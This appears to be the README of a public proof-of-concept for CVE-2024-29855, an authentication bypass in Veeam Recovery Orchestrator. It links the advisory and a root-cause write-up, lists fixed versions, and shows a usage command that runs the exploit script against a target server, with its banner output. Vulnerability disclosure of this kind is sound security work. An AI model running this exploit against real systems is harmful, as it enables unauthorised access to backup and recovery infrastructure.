PoC for the Veeam Recovery Orchestrator Authentication Bypass CVE-2024-29855
# CVE-2024-29855
Veeam Recovery Orchestrator Authentication Bypass ([CVE-2024-29855](https://www.veeam.com/kb4585)) by [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [SummoningTeam (@SummoningTeam)](https://x.com/summoningteam)
## Technical Analysis
[A root cause analysis of the vulnerability can be found on my blog](https://summoning.team/blog/veeam-recovery-Orchestrator-auth-bypass-CVE-2024-29855/)

## Summary
Veeam published a [CVSS 9](https://www.veeam.com/kb4585) advisory for an [authentication bypass vulnerability CVE-2024-29855](https://www.veeam.com/kb4585) affecting [Veeam Recovery Orchestrator](https://www.veeam.com/disaster-recovery-orchestrator.html). The following is my full analysis and exploit for this issue. Although the issue is not as severe as it might sound (DO NOT PANIC AT ALL), I found the mechanics of this vulnerability a bit interesting and decided to publish my detailed analysis and exploit for it.
<p align="center">
  <img src="/poc.jpg" />
</p>
## Vulnerable versions?
According to Veeam's [official advisory](https://www.veeam.com/kb4585), the vulnerability discussed was resolved starting in:

- Veeam Recovery Orchestrator 7.1.0.230
- Veeam Recovery Orchestrator 7.0.0.379
## Usage
```
python CVE-2024-29855.py  --start_time 1718264404 --end_time 1718264652 --username [email protected] --target https://192.168.253.180:9898/
 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |
                                                                                    
        (*) Veeam Recovery Orchestrator Authentication Bypass (CVE-2024-29855) 
        
        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)